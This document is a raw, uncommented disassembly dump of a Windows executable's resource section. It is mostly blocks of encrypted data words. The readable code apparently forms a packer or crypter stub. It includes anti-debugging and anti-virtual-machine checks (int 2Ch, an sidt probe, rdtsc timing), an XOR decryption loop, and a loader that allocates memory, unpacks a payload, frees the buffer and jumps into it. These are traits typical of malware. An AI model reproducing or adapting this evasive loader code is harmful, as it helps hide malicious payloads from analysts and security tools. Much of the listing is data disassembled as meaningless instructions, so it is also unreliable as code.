dd 0ED72620Bh, 2E689575h, 316F3F52h, 6C612E64h, 44D620BBh
dd 6EF25BE8h, 8CE05DF2h, 0A398BAA9h, 7540E209h, 7726573h
dd 642E3233h, 4D0F1E6Ch, 619F3E5Fh, 6F42C367h, 77834178h
dd 0B5C511DDh
; ---------------------------------------------------------------------------
loc_408350: ; CODE XREF: .rsrc:00408378�j
xor esp, [esi+14h]
imul edi, [eax+40h], -1Ah
insb
cmpsb
and eax, ds:74697845h
push eax
ficom word ptr es:[eax-51h]
movsd
dec edx
; ---------------------------------------------------------------------------
db 80h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
in al, dx
push ebx
cwde
cmpsd
push eax
call near ptr 8159DE87h
jmp short loc_408350
; ---------------------------------------------------------------------------
cmp eax, 0CCE3218Bh
push cs
add ecx, [ecx]
retf
; ---------------------------------------------------------------------------
db 51h
dd 969293FFh, 893A0248h, 4EFC4526h, 0D3030404h, 0F4FB7F88h
dd 1A27C602h, 0C3F60E52h, 7537C690h, 0C0184CFCh, 835AAB14h
dd 0EB04C20Eh, 0CC6A1E0h, 208B068Bh, 168FBB75h, 0FFB805A3h
dd 5BA90350h, 36C95D34h, 7DE56F2Dh, 447C68Fh, 3BC15FEEh
dd 0F44474C3h, 0CF9A3877h, 0F3033D1Eh, 0D82BD340h, 78FC5D89h
dd 0DAF1EDADh, 2AA53CD7h, 0E983C884h, 9373C708h, 281666EDh
dd 0EF0981F8h, 0FB9BA70Fh, 0CE8C1C1h, 0CD26E3D2h, 818B11C2h
dd 49070197h, 0EBE1C8C7h, 0A063A5CCh, 960EDF60h, 0A9792808h
dd 0DC201441h, 0AA45843Ch, 3E837634h, 0B70548C3h, 0C9A90C43h
dd 0DE9861E8h, 6FEED1C4h, 7E0072FDh, 7EEB6802h, 0C4338B51h
dd 53082E55h, 0C07E3D6Ah, 3B0E5B50h, 4D507DCFh, 0ECA13CD2h
dd 25A17012h, 0A057433h, 5C86D615h, 0C139A9C6h, 3CE4EB8Bh
dd 410ECD87h, 302975E9h, 571E0192h, 1807F838h, 177D08EBh
dd 0EE9D8E9h, 60CEA757h, 0C48610C0h, 0CC89F22Bh, 5625F24h
dd 0B3EB9983h, 0AFD041EDh, 3259785Bh, 3B505118h, 0BE01B7C3h
dd 0EC830E4Bh, 2A746602h, 8E1654E8h, 9C59505Fh, 0C8496210h
dd 37495CE9h, 24D54F5Dh, 669D9560h, 7CC94DD4h, 8B1A0C48h
dd 0C00F8F07h, 0F4EB0889h, 0C3EC961h, 0A7FAB6h, 0C131544h
dd 8B0D915Fh, 70B767B9h, 0C1629B8Bh, 17270448h, 1C4CC23h
dd 10420E26h, 0A4E94008h, 0F21D13A8h, 0BD163303h, 384B8533h
dd 0F985C17Eh, 81A5F302h, 0D2E183D6h, 9C6C78EAh, 7B2BFA7Fh
dd 0E8E81C04h, 2B5D6909h, 200494EBh, 98C11634h, 30772BF7h
dd 0C748FED5h, 0C757584Ah, 5D525614h, 235A84A5h, 913451A7h
dd 0B7241689h, 42B0654h, 5AD0FF56h, 64240CC4h, 673D6F24h
dd 0B1EB2841h, 3A883922h, 90E95FAh, 0EB816B7h, 0F3A75974h
dd 2E0943Bh, 73EE628Ch, 90E49604h, 0B5E68F02h, 31AE1AF4h
dd 0AAE2D443h, 0BFA883BAh, 86885CF1h, 80ADADE2h, 4B28EB24h
dd 3970FFD8h, 75107A46h, 74061604h, 671D272Ch, 76431603h
dd 65C64E5Ch, 3D837E83h, 712148FFh, 51575001h, 5419E853h
dd 22DD86A7h, 0C31074Ch, 6EC9EB14h, 890CE5Eh, 53B07816h
dd 86110EEFh, 0C450417h, 0A3A58389h, 73105CB2h, 0B98C8B25h
dd 0D6F2DCFFh, 0DDBA59D2h, 0FB85477Fh, 14557310h, 2F4D2FAh
dd 6FB0D6FAh, 44F20DCAh, 0C74ACAC4h, 9911A039h, 52498ADFh
dd 0A2A9444Ah, 0F00A28E2h, 22E28125h, 0AC0BEBE3h, 48031ACBh
dd 0C2153953h, 58093F02h, 0B841092Dh, 23087252h, 5A118390h
dd 2920689h, 0C20B0BEAh, 0D79B0E05h, 0DC5AE505h, 5B415D06h
dd 0FF01C8A3h, 8B6000CCh, 8B242474h, 8B28247Ch, 0FC2C2444h
dd 80B2DB33h, 42741839h, 0E802B3A4h, 6Dh, 0C933F673h, 64E8h
dd 331C7300h, 5BE8C0h, 23730000h, 0B04102B3h, 4FE810h
dd 0C0120000h, 3F75F773h, 0E8D4EBAAh, 4Dh, 1075CB2Bh, 42E8h
dd 0AC28EB00h, 4D74E8D1h, 1CEBC913h, 0E0C14891h, 2CE8AC08h
dd 3D000000h, 7D00h, 0FC800A73h, 83067305h, 2777FF8h, 8B954141h
dd 5601B3C5h, 0F02BF78Bh, 0EB5EA4F3h, 75D2028Eh, 46168A05h
dd 33C3D212h, 0EEE841C9h, 13FFFFFFh, 0FFE7E8C9h, 0F272FFFFh
dd 247C2BC3h, 247C8928h, 10C2611Ch, 80B500h, 95E00h, 14700h
dd 865A00h, 800800h, 800C00h, 40000000h, 76CAB800h, 888DF040h
dd 10001082h, 8B014189h, 8B042454h, 2C60C52h, 5C283E9h
dd 4A89CA2Bh, 0C3C033FCh, 4076CAB8h, 58F64F0h, 0
; ---------------------------------------------------------------------------
add esp, 4
push ebp
push ebx
push ecx
push edi
push edx
push esi
lea ebx, [eax+10001043h]
mov edx, [ebx+18h]
mov ebp, eax
push 40h
push 1000h
push dword ptr [ebx+4]
push 0
mov ecx, [ebx+10h]
add ecx, edx
mov eax, [ecx]
call eax
mov edi, eax
push eax
mov esi, [ebx]
mov edx, [ebx+18h]
add esi, edx
mov ecx, [ebx+0Ch]
add ecx, edx
lea eax, [ebp+1000111Dh]
push dword ptr [ebx+4]
pop dword ptr [eax]
push 0
push eax
push edi
push esi
call ecx
pop eax
add eax, [ebx+8]
mov edi, eax
mov edx, [ebx+18h]
mov esi, eax
mov eax, [esi-4]
add eax, 4
sub esi, eax
mov [esi+8], edx
mov ecx, [ebx+10h]
mov [esi+24h], ecx
mov ecx, [ebx+14h]
push ecx
mov [esi+28h], ecx
call edi ; VirtualFree
mov [ebp+10001121h], eax
mov esi, eax
pop ecx
add ecx, [ebx+18h]
push 8000h
push 0
push edi
call dword ptr [ecx]
mov eax, esi
pop esi
pop edx
pop edi
pop ecx
pop ebx
pop ebp
jmp eax
; ---------------------------------------------------------------------------
db 5Eh
dd 9, 82Bh dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 35D9h dup(0)
; ---------------------------------------------------------------------------
cld
call loc_41802E
; =============== S U B R O U T I N E =======================================
sub_418006 proc near ; CODE XREF: .rsrc:0041807D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41800E: ; CODE XREF: sub_418006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41800E
pop ebx
retn
sub_418006 endp
; ---------------------------------------------------------------------------
db 0BFh, 0EBh
; ---------------------------------------------------------------------------
loc_41801F: ; CODE XREF: .rsrc:00418068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418021: ; CODE XREF: .rsrc:00418036�j
; .rsrc:00418047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_418055
; =============== S U B R O U T I N E =======================================
sub_41802B proc near ; CODE XREF: .rsrc:0041804A�p
; .rsrc:00418050�p
rdtsc
retn
sub_41802B endp
; ---------------------------------------------------------------------------
loc_41802E: ; CODE XREF: .rsrc:00418001�p
test eax, eax
jnz short loc_41803A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_418021
jmp short loc_418049
; ---------------------------------------------------------------------------
loc_41803A: ; CODE XREF: .rsrc:00418030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_418021
loc_418049: ; CODE XREF: .rsrc:00418038�j
push ebp
call sub_41802B
xchg eax, ecx
call sub_41802B
loc_418055: ; CODE XREF: .rsrc:00418029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 156D8h
sub eax, 100h
jnb short loc_41801F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_418006
push esp
jmp short loc_4180A6
; ---------------------------------------------------------------------------
db 0F7h, 4Eh, 9Eh
dd 0B115B5D4h, 6AA6FEFFh, 0E231E191h, 41FDD65Dh, 0C10210h
dd 0AA2F265Bh, 390F0CDEh
; ---------------------------------------------------------------------------
lea edx, [edi]
loc_4180A6: ; CODE XREF: .rsrc:00418083�j
fsub dword ptr [eax-20h]
mov dh, 0E6h
in al, 75h
or [ebx], bl
mov dl, 0ADh
test [edi+2FCCACE8h], edi
repne xor [esi], ebp
adc [ebx-48D2A30Dh], esp
push ebp
dec edi
nop
mov edi, 33917F59h
and al, 8Dh
mov edi, 83B2F3F7h
cdq
loop loc_41812A
push ebp
inc edx
sti
; ---------------------------------------------------------------------------
db 8Ch, 0F2h, 6Ch
dd 9671BF42h, 35791A55h, 9FB4694Ch
db 0EFh, 0C1h, 0
; ---------------------------------------------------------------------------
loc_4180E7: ; CODE XREF: .rsrc:0041814E�j
stc
daa
pop esi
push ds
mov dl, 53h
neg byte ptr [esi]
bound ebp, [edi]
popa
pop eax
cmpsb
push ebp
mov bh, 13h
inc ecx
add [edx], cl
mov bl, [ecx-0CFF2B31h]
adc [esi], dl
jp short near ptr loc_41812F+4
jz short loc_418150
retf 55B8h
; ---------------------------------------------------------------------------
pusha
cld
adc eax, [edx+ecx*2+0E84110h]
retf
; ---------------------------------------------------------------------------
db 0EBh
dd 0F91AF4AAh, 20690726h, 8EA0696Eh, 4088EBAAh, 6AEFE6DCh
; ---------------------------------------------------------------------------
xor [esi], cl
loc_41812A: ; CODE XREF: .rsrc:004180D0�j
and eax, 78B9AEC9h
loc_41812F: ; CODE XREF: .rsrc:00418102�j
adc edx, [ebp-1565895h]
lock xor [ebx-4253D0ABh], edi
db 65h
mov eax, gs:2F950F81h
call near ptr 343B3CF2h
sub eax, 411573h
xchg eax, edx
jnz short loc_4180E7
loc_418150: ; CODE XREF: .rsrc:00418104�j
mov edi, 0D6967B8Ch
retn 54A6h
; ---------------------------------------------------------------------------
dd 0BCD11230h, 8401386Ch, 0C8266865h, 0DBF9CAB5h, 25C833AAh
dd 72285940h, 26E99C9h, 277E8F81h, 452F8271h, 6B8B1500h
dd 0A66AF117h, 5B5F6A55h, 7E2A166Ah, 96B0EDB7h, 536BDB5Ah
dd 0FEE79AFEh, 1308C29Ah, 411C7867h, 4E541FEBh, 96B2D698h
dd 6CB89155h, 2AD8292Ch, 128CDB42h, 412E6F81h, 81CD5D8Bh
dd 0FE47C6EAh, 492F6055h, 0C03B9E89h, 0C2EDC69Ah, 2B307135h
dd 9A4EE300h, 1386F786h, 6B57D95h, 7CDC1D03h, 86877D27h
dd 0AEB97365h, 0EBD50BB9h, 966548AAh, 0CC334445h, 0DBCFE295h
dd 692C39AAh, 61D8F6B7h, 0E3B5DC8Bh, 1BD30B99h, 712FD9C0h
dd 604BD200h, 86DC4556h, 162A30ABh, 0EAE12168h, 771932AAh
dd 0C237487Eh, 2B6703C4h, 94754AA5h, 2BAF7955h, 83E24E00h
dd 168ECBAAh, 40397A3Dh, 0A71DA00h, 138FE081h, 9ABE7495h
dd 81E52602h, 96F881AAh, 2B3B7855h, 0E70EE600h, 0C690B8FDh
dd 403C7C3Dh, 0A72D700h, 0FE92E381h, 413C7E5Fh, 0C009BCFFh
dd 937BD49Ah, 0A83E7F55h, 0EBE928AAh, 75CDD5C0h, 0BE35EA5Fh
dd 0DBC64295h, 55643DAAh, 6D453CD6h, 0E4EB2C30h, 96945A2Eh
dd 41476A55h, 0BFA22D00h, 96DB94EEh, 6D5F16AAh, 5E602E30h
dd 96A8CE14h, 0FCCE4D66h, 0EBDE0379h, 7E0AD71Bh, 41448791h
dd 0C7468D83h, 999ADB9Ah, 4147DFD1h, 9675BA00h, 699BEC86h
dd 0C4C98625h, 0EBC11939h, 0BDA5602Bh, 0BEB88865h, 6CFD3300h
dd 969DDC90h, 6DD90CDEh, 9B0C3430h, 101B50ABh, 0C049BA7Eh
dd 0DBDFB3BDh, 96601FAAh, 5ACD8455h, 60F53602h, 0A68C602Fh
dd 403B7355h, 0C07BB28Fh, 2B20E29Ah, 417CA6D8h, 0EBF7C7FFh
dd 975E64A5h, 0CCC68E55h, 0EBC81585h, 0E75CFD49h, 0DBCB0054h
dd 6AF90A2Bh, 0A68F7F17h, 41B06F55h, 307D3400h, 7EA5E6ABh
dd 415090B3h, 0C704818Dh, 592DE79Ah, 98A7923Fh, 68F84DFFh
dd 0D6CDEB4Bh, 2B056A56h, 66E55400h, 0A6BD7E1Fh, 414F2D55h
dd 0EF733F00h, 695614E7h, 0CCFFF3AAh, 0EBFF0D04h, 3DCCEBAAh
dd 0EA51D1D8h, 8AACA532h, 1C500E00h, 2A56FD82h, 0ED012255h
dd 98C62127h, 433D5CDCh, 0EE02436Ah, 0C8ED84A5h, 1456F30Ah
dd 0C38AD1FCh, 19F6EF9Eh, 1131DA9Dh, 7B044564h, 10AF9A7Bh
dd 2C5EF196h, 0A3072C05h, 0C8D8F1DAh, 2D5B9C3Bh, 0D6C1606h
dd 10240DE1h, 175CAD70h, 0FCF8CD5Eh, 9EB3CE36h, 49E8135Dh
dd 4D087918h, 9FB3FCA6h, 0EFAD70D5h, 0E509A788h, 2539F584h
dd 4B6FB459h, 6387ABF5h, 0A185EFE7h, 0DF55E32h, 1F0B7C27h
dd 0A2B6F7A0h, 260ECD2Dh, 8A5C3D79h, 0CFDE8EDEh, 1807C407h
dd 9C78226Ch, 5BE8F9F9h, 7F487DF6h, 278BC60Eh, 0F5B9CA92h
dd 3A44CF30h, 6E9AAFF0h, 23BACB96h, 6E10F9A5h, 0AA123B86h
dd 0CD6F77EDh, 438EF567h, 0AE115211h, 0CAD9B9D9h, 2137CF12h
dd 927B257Bh, 0A9D899D8h, 89FD563Eh, 74136438h, 0FCE8A97Ah
dd 0AA3EFC39h, 30382C81h, 0BB7A7CBFh, 9BFC553Dh, 6B14653Eh
dd 53BC95C0h, 6745AFFEh, 33CEC16h, 8629FFC1h, 7C65238Dh
dd 96EB0243h, 0AE8ED393h, 0FCEA5C5Eh, 42479F5h, 50E9ABC3h
dd 6A45FFFBh, 71D4D019h, 4E3DB998h, 0A487D86Bh, 6C1C716Eh
dd 4E9495C5h, 6C45E7E5h, 73D4D01Bh, 47566C1Ah, 6E69AA75h
dd 38F7C4D5h, 9F537AFEh, 761CAA42h, 19F4949Ch, 0E0EEFFC8h
dd 0F38FC23h, 9FEB064Eh, 0B58ED434h, 14306AF1h, 2F60AA10h
dd 5B3B70C2h, 89699A59h, 0F3EBA84Ch, 7A2B0098h, 89699A5Dh
dd 25D0D4B9h, 0EFBEFFCDh, 48A43F88h, 9BEB5512h, 0B98ED400h
dd 9B934491h, 0F1455DCh, 89E4FFCEh, 3438FBB0h, 10153D75h
dd 7F35FFCBh, 6A03FA2Bh, 0D24691AEh, 0E8C89A86h, 9889427Bh
dd 8799AAD9h, 0BD8EEA9Dh, 3838FB2Eh, 38C5C0D8h, 7A3DFFE2h
dd 96E2695Dh, 144C0D70h, 0BFBEDF87h, 6A69BADCh, 15145528h
dd 0C0BEFFD4h, 6B69AA7Fh, 0E947037Bh, 0F1952640h, 0C0300180h
dd 0EC6195AFh, 9E7D1134h, 81ACBC3h, 7D793462h, 0A9DCB0B3h
dd 1D1DC9E7h, 7A710671h, 0B6D7A9ACh, 369DFF7h, 7966215Dh
dd 0A9BE8BB8h, 1C1BDEF7h, 58143B4Ah, 0B2DF9AA8h, 1D00ECE0h
dd 5F141455h, 0B3DF9AA9h, 1E00ECE3h, 6D751854h, 0AFD096ACh
dd 12AAAC6h, 7B603457h, 0AAD18D8Dh, 351AD9EDh, 7A661633h
dd 98DB8BBFh, 106C7ECh, 527C0151h, 0CBDA9EBAh, 170CD8C9h
dd 49403041h, 0A8DF9A92h, 121BE98Bh, 76712157h, 0A5D2908Eh
dd 4B19C6E9h, 427A0605h, 0A1D68C92h, 12CAAF9h, 4C402151h
dd 0ABDF9A91h, 0E0CED8Eh, 40783C7Fh, 0A2CA8BA5h, 0F1CC8E6h
dd 2655265Fh, 97CA9AA2h, 2F0CC6F9h, 27712F52h, 94CA9AA1h
dd 290CC6F8h, 28713855h, 9ECA9AA0h, 121CCEFDh, 457D1358h
dd 0B9DFB18Dh, 3869EBF6h, 4559215Bh, 0B0D28A8Dh, 0E407CBDCh
dd 2B553053h, 85CA9AADh, 0E41DD9ECh, 5E7D112Dh, 0B8CA9C8Eh
dd 8228D3E4h, 79603006h, 9ECE9289h, 0CD0CC6FEh, 6F713823h
dd 0ADDBB8EDh, 0F404CFCCh, 47603413h, 0BFF9FFAFh, 0F70CFCEDh
dd 5E7B3C37h, 0AFDBB8EFh, 0F51BCFCCh, 747A3A2Ch, 9BBEBE88h
dd 0E83FDEFEh, 5779202Ah, 0B2D891B8h, 0FC08C7EEh, 727A3A2Eh
dd 0AADBB8F2h, 0ED07C3CAh, 70672227h, 0BCDB8D9Ah, 0F31BC5EAh
dd 5A781249h, 0A1D29E96h, 0E806C6F3h, 577B194Ah, 83D7B391h
dd 0F51BCBD2h, 5659550Ah, 87D7A986h, 0CB0FE5D6h, 38713925h
dd 8DDB8FB8h, 0EB05C3E4h, 49643400h, 0A5D99191h, 0EA19E5A3h
dd 55660520h, 96CD9A9Ah, 0FF1BFAA4h, 4867302Ch, 8FF8CDC9h
dd 911DD9D7h, 5F7B2700h, 0D4CD8C9Eh, 0EA0CE494h, 58465525h
dd 81F89B9Dh, 0C069CFCBh, 57522137h, 9DFF9A91h, 0F600D8DCh
dd 4C712126h, 8FEDFFBFh, 0F900ECDDh, 297B0531h, 99DB8B91h
dd 0E20CF9AAh, 24783C13h, 8ED26954h, 0F306F8AAh, 14152630h
dd 9BA16C6Eh, 0E10EC5FCh, 2850311Ah, 0BDC1676Ch, 0E318DFC3h
dd 2D563434h, 0EBA16C6Ch, 0E204DCFDh, 2D711F30h, 9F8D0465h
dd 0E304CBEBh, 33492E26h, 87AD7369h, 0E50AD7CFh, 24713401h
dd 9F8B066Eh, 0F715C3E9h, 285D3921h, 0A5C6626Ch, 0F303F1DEh
dd 11792934h, 8EA46772h, 0D872C0D9h, 246F1D21h, 0BBAD7D61h
dd 0F310DBD8h, 395B2C26h, 0A8BD4400h, 0E215D0D8h, 227A3330h
dd 85A56274h, 0DB01F8AAh, 28761134h, 8D847B65h, 0E215D2F9h
dd 414F0D3Ch, 9B83794Eh, 0FF31D6CFh, 0F220639h, 8EBD4174h
dd 0F90AE9C4h, 32500136h, 8EA56054h, 0E237BAC4h, 2F41151Ah
dd 9FAC7553h, 9614D4C3h, 3375121Bh, 88B5656Fh, 0E412EADEh
dd 2D471221h, 84BC774Dh, 0D87CC4D8h, 24523921h, 92816A72h
dd 0FB18CAD9h, 2E4E071Ch, 9FB27972h, 9610D0C3h, 337E1E1Bh
dd 0BDB16169h, 0E30BB2C3h, 24670734h, 92A7796Dh, 0FAF493AAh
dd 22420200h, 0B8B3736Fh, 0F8E8B0DEh, 433932h, 0B8BE6B6Eh
dd 0F8EBB1DEh, 127A6E32h, 8AAC4A41h, 0E6F6B0D8h, 2E420C55h
dd 84AA7F73h, 0E2E1AEC9h, 2F401355h, 9FB97E6Eh, 0E2E0A1AAh
dd 35431E3Dh, 8AB56562h, 0E486A2C7h, 41471130h, 8FB27873h
dd 0F5E8BBAAh, 4146163Eh, 8EA97049h, 0E2EDA7D8h, 325C1816h
dd 85BF5765h, 96ECA6CEh, 24401B1Ch, 9FBA4E72h, 0D5FEAEEDh
dd 245B183Ah, 8F855563h, 0E2EAB8F9h, 2F7F7730h, 85934774h
dd 0E6C3B9CFh, 41761630h, 8E964D49h, 0E2E8A0D8h, 2F5D091Ah
dd 0AA8F5655h, 0E2E086AAh, 24570830h, 8A817774h, 0FAE696CEh
dd 57B7B30h, 0A2B56756h
dd 0D2BEE399h, 133B3019h, 87A54065h, 0DDF4A1C5h, 133C0430h
dd 9BA84F65h, 0F3D9BDCFh, 453B2Ch, 8C8D7B00h, 0E4F6A1FBh
dd 2D5F292Ch, 93AC4F75h, 0F3C6D5EBh, 355AD332h, 9E864A56h
dd 0D7ED93CFh, 44A90255h, 83BAE42Bh, 7E96D7AAh, 4265CED8h
dd 0EE862D6Ah, 0FCC488FBh, 118E0850h, 0BFBDFA8Bh, 0C4C999C0h
dd 0DCD67B06h, 68EE1F2Ch, 366D66Eh, 4174A9F0h, 28E7F483h
dd 3F1F56FDh, 7245B640h, 0EB9A61FFh, 364D2C0h, 4176AB1Ch
dd 6FFEF285h, 969CDD3Ah, 2113E005h, 3F793300h, 5A16DEC0h
dd 4120C93Fh, 81F32400h, 96F48DA8h, 4129DE3Dh, 0BAF45F00h
dd 360B0F9h, 417AA7D8h, 7E0A6F5Fh, 9690CA67h, 1D3F73D0h
dd 0FE76BA8Bh, 9A42E29Ah, 514C18D8h, 3AF43830h, 445DB0FDh
dd 6D300BDEh, 64753930h, 96A3FF92h, 0BEB1DBBDh, 7A7CB1FFh
dd 1BA4D586h, 415415DAh, 14B9D300h, 132E1955h, 4160BDD4h
dd 0F077B38Dh, 0A44EE7AAh, 0CAAE6DAAh, 0DBD0B885h, 0E2676DAAh
dd 0D8DD1E5Eh, 3FD3E1Bh, 695716B7h, 820C53DEh, 0EBFED755h
dd 17F4EAAAh, 714E13B8h, 66367300h, 0A68A0B2Fh, 1001C755h
dd 0BD511151h, 0BBAA7954h, 46D19766h, 2094BD25h, 0C5ACDD87h
dd 16579C95h, 0EE0243EAh, 742CB3ADh, 446883EDh, 7A8EBB69h
dd 9A9EF52Eh, 6594C809h, 0F02E4520h, 0FDA3342Ch, 5C9C1E9Dh
dd 0D1C84635h, 86787477h, 477F9C6Bh, 315B472Ch, 9CDBF3DBh
dd 3BA3AEA3h, 7612B703h, 0F6428772h, 495D9E56h, 0F7539983h
dd 2A3EC8E3h, 4A6E85BAh, 0F405F082h, 2A3FF5B4h, 4B5FA157h
dd 3D21B309h, 527E7DD5h, 4914C0C6h, 1CFEAE4Ch, 0AD717474h
dd 1EB52936h, 0AC5C8187h, 0F1E6B8DDh, 0DB9D5C08h, 0F93D6290h
dd 2FB43D3Bh, 7F4FADF6h, 79D9640Eh, 0A27EFD53h, 508CA50Eh
dd 380C0786h, 8A4D6ED3h, 0D560A655h, 3C235918h, 2EA14CF9h
dd 624A50F3h, 70F3A511h, 56169CFEh, 9086DDAEh, 0FE12BB47h
dd 28E0FEBDh, 6473DF85h, 48EDF13h, 29BECF92h, 55618E15h
dd 0ADD11Bh, 473FFFBFh, 5669A862h, 103D41h, 3941FFC0h
dd 57598642h, 8699A99Dh, 0ADBFFBE5h, 5803FA6Ch, 31451FFh
dd 0FAECA9C2h, 0CC96FD6Dh, 424793Dh, 383336F0h, 5A69AB6Ah
dd 77E0448h, 0D8BF9595h, 1B69AA6Fh, 0F781AA48h, 27BECFEEh
dd 71D5CF5h, 37C014Bh, 0E5BEFFC7h, 7D4D1E8Eh, 0F714551Eh
dd 83922652h, 9EECF372h, 1DF74369h, 0DE6A7498h, 838F873h
dd 7F81AA48h, 0ECBECFE5h, 0B01C6AF1h, 0C681AA49h, 3BBECFE1h
dd 363BEE22h, 814C114Ah, 0B7BFFB5Ch, 0A25A0176h, 0FE4D454Bh
dd 0E8EEAF67h, 3339FA27h, 0F781AA70h, 38BECFE6h, 646BA2BCh
dd 2B60AA23h, 732B00C6h, 36699A55h, 3CDDC0DBh, 79E3FFFFh
dd 58E9AA7Eh, 5715202Fh, 0A9C2725Bh, 7E8AAA4Bh, 214C0ABh
dd 6CBDFFE1h, 0ECBB552Ah, 0EC9C5AE7h, 0B1BEFFD2h, 69695AF9h
dd 2E2AD528h, 3FF8EFA6h, 0EE66AA40h, 151455C8h, 0B59EC154h
dd 55E8EC8Eh, 515A1C7Ah, 0E35DDA0h, 2368EC46h, 7D459B00h
dd 91E8AED6h, 41A83F7Eh, 234D551Ch, 7C3BF016h, 8769AA82h
dd 1914559Ch, 96EEC159h, 0EA66FCCAh, 1A14558Bh, 69B6395Ah
dd 0F466A7B8h, 1B1455B6h, 35CBDFE6h, 7E539629h, 1C14D9B5h
dd 0E7B352DBh, 4F498AA6h, 69713210h, 0F41280A9h, 0F215DFA7h
dd 7634AA4Ch, 0B8CB8BA9h, 46AD409h, 6A3B7A09h, 35F939B6h
dd 0CF58A589h, 20147224h, 34EC1D28h, 4645C31Fh, 71D46635h
dd 24EEAFB0h, 7769AA82h, 4C633A72h, 0A9DF908Dh, 0A9FC558Ch
dd 0A614651Bh, 0FD888B22h, 82EC2344h, 75146514h, 0CFBDFF8Bh
dd 2C38FB0Ah, 0F081AA69h, 5DBECFC8h, 4B72DA1Ah, 0EF27053Ah
dd 83EEAEB1h, 0E996FBC1h, 2724793Ah, 2D9AFB61h, 4D426704h
dd 0A8D7AD3Ch, 0E3AB906Ah, 0BD90AB92h, 2D3009B6h, 0D4BEFF00h
dd 92E8F793h, 2A244843h, 0E5FD4262h, 35E2AAA4h, 2B246574h
dd 5B3504E9h, 81599AD2h, 0A99FF0B3h, 0D78ECFA8h, 0B2563F1Dh
dd 0A8175571h, 0D88ECFDBh, 0B01A81Eh, 0D1145551h, 0E9929678h
dd 0D8A04198h, 46623007h, 8AE29A8Dh, 0EC1AD3F1h, 7D783427h
dd 0A9D1928Ah, 545AAAE3h, 0C7469ACEh, 3D3DAD29h, 8429C098h
dd 584602BFh, 660B72E9h, 31699A81h, 33145550h, 20F3FB7Fh
dd 0EF965562h, 7910D8E3h, 0DFBEFFF3h, 0CDE401F8h, 0D126FE4Dh
dd 2159958h, 0B8FC2764h, 6214657Ah, 1EECF99Fh, 0BC453335h
dd 1360DE4Bh, 0FA7A7CFEh, 8666A24h, 381454E9h, 0C3D6FF9Dh
dd 0D869AAA3h, 0ACEB5E27h, 0E48ED359h, 465F428h, 0A79D4500h
dd 0E58ECFCEh, 0A052272Dh, 0D895557Fh, 0E9410FFAh, 9103F9F4h
dd 89EB533Ah, 0E78ECFC8h, 0BE2C3F59h, 0C2445561h, 0D88ECC49h
dd 5EFC55A7h, 66146579h, 0E62D3F78h, 9468FE2Ch, 4953353h
dd 0E6CAA5B3h, 0F8FC55FAh, 0A9146578h, 0EBBEFEBEh, 96A11427h
dd 0F61B5555h, 9F321E4Eh, 9202B49Bh, 16155654h, 0C7E194FFh
dd 0C13DAC9Ah, 6AFFC2AAh, 0A84A0230h, 1DAFAE96h, 92142005h
dd 60E2718Bh, 0A2E0B6E0h, 42B50866h, 0EABB85C3h, 0E40BFCCFh
dd 0B3FB5F21h, 0C269EE59h, 0E4E494A6h, 0B2190271h, 0E4D9548Bh
dd 953EB51Dh, 0C32FD786h, 0A54DF403h, 0A9C43BA2h, 0CA1C6D65h
dd 0DC723336h, 0E472839Ah, 76A875D6h, 0D0C83930h, 0A6438F1Fh
dd 309D5055h, 0D836F5FFh, 0D5C13C6Ah, 0C81F5065h, 0DBFA4C8Dh
dd 0FC25E6AAh, 404A3156h, 0EBCB0C68h, 1389E02Ah, 4111772Dh
dd 0C03D98FFh, 1B88B89Ah, 4112762Dh, 0E432F683h, 6987822Eh
dd 72A6EDAAh, 81CE3F30h, 0C079D0AAh, 20B19A05h, 60CF202Ch
dd 0A64AFC2Fh, 43C5A755h, 0EBBA4150h, 0BA462955h, 0C4AF6765h
dd 0EBE1224Bh, 96166921h, 11159707h, 0DBE1A6FFh, 382BE9Ah
dd 4118450Ch, 0DBE0918Bh, 92F7BF9Ah, 8CBC9571h, 60D4252Bh
dd 23F4FCF9h, 411A5B1Eh, 0DFCF428Bh, 3AB3F21h, 411B5C62h
dd 0DB919A8Bh, 0BD2CC29Ah, 0BBCEC697h, 0F6A39D8Dh, 0C7D3C39Ah
dd 107C3E06h, 0C7D98CFFh, 69D3C49Ah, 7105A2C0h, 98FCD900h
dd 0F3BEEF90h, 2D4D113Bh, 0ABE07F65h, 0FAE0AED9h, 6F024239h
dd 0C7B77064h, 0C586F687h, 465210Ch, 9E9F414Dh, 0F8E2BAD8h
dd 2F5D3021h, 87B26C74h, 0CAFCACF9h, 37411106h, 98BB7C69h
dd 0F7E199F6h, 501027h, 98BA4363h, 0F7DA97D9h, 24581727h
dd 98924474h, 0E4E28AF6h, 2D570030h, 878E726Ch, 0CAF5AEC3h
dd 2F560C06h, 8F904264h, 0F0E2BCFAh, 1D5D153Ch, 83975141h
dd 0ECE7BDC5h, 31781E30h, 888D4970h, 0F9E6A4CBh, 0D66083Bh
dd 0EB915569h, 0C2D69EF9h, 4693D02h, 888F6A5Ch, 0F9E2BDD8h
dd 16600933h, 84834669h, 0D5CEA0DDh, 244F0C20h, 8EBE5D6Eh
dd 0F9FAA7D8h, 397B233Bh, 99864670h, 0C294A7CFh, 2458F234h
dd 98856374h, 9697D6DEh, 4140D155h, 999B2C00h, 0FBFFAFC5h
dd 2A35EC7Bh, 9B804372h, 0F8FEF6CBh, 0F42EC33h, 0CBA66D49h
dd 0FCEFAEDDh, 2722E933h, 0AEBD7A0Ah, 0DCEAFAF8h, 610ACC1Ah
dd 99864626h, 9CA9AEDEh, 41456E00h, 6AAD3100h, 0A6BB3A47h
dd 2EC34155h, 0EBF10215h, 0BAB14855h, 0A9868865h, 81A3471Fh
dd 772855B4h, 1848B97Eh, 9EDD08ACh, 0A81FB980h, 623C97AAh
dd 0C705888Dh, 0E014E09Ah, 27EFDC57h, 0E570BBA5h, 19A0D181h
